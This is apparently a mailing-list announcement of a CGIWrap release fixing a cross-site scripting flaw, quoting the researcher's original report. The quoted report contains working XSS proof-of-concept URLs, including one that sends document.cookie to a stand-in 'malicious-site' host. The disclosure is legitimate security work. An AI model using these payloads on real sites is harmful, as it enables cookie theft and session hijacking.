The following cross-site scripting vulnerability was reported in
cgiwrap. This has just been corrected in version 3.7 which has just been
released.

http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

All error message output is now html encoded to prevent this problem.

-- Nathan

> "TAKAGI, Hiromitsu" wrote:
> >
> > Hi,
> >
> > I found a cross-site scripting vulnerability in CGIWrap. Cookies
> > issued by the server on which CGIWrap is installed can be stolen.
> >
> > Please try to access the following URLs.
> >
> > Confirming the bug:
> > http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
> > http://www.unixtools.org/cgi-bin/cgiwrap/>
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>TEST</S>
> > JavaScript code will be executed:
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>alert(document.domain)</SCRIPT>
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>document.write(document.domain)</SCRIPT>
> > http://www.unixtools.org/cgi-bin/cgiwrap/)>
> > Stealing your Cookies issued by www.unixtools.org, if any:
> > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
> >
<snip>
> >
> > Regards,
> > --
> > Hiromitsu Takagi, Ph.D.
> > National Institute of Advanced Industrial Science and Technology,
> > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
> > http://www.etl.go.jp/~takagi/
>
> _______________________________________________
> cgiwrap-users mailing list
> cgiwrap-userslists.sourceforge.net
> http://lists.sourceforge.net/lists/listinfo/cgiwrap-users

-- 
------------------------------------------------------------
Nathan Neulinger                       EMail:  nneulumr.edu
University of Missouri - Rolla         Phone: (573) 341-4841
CIS - Systems Programming                Fax: (573) 341-4216

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]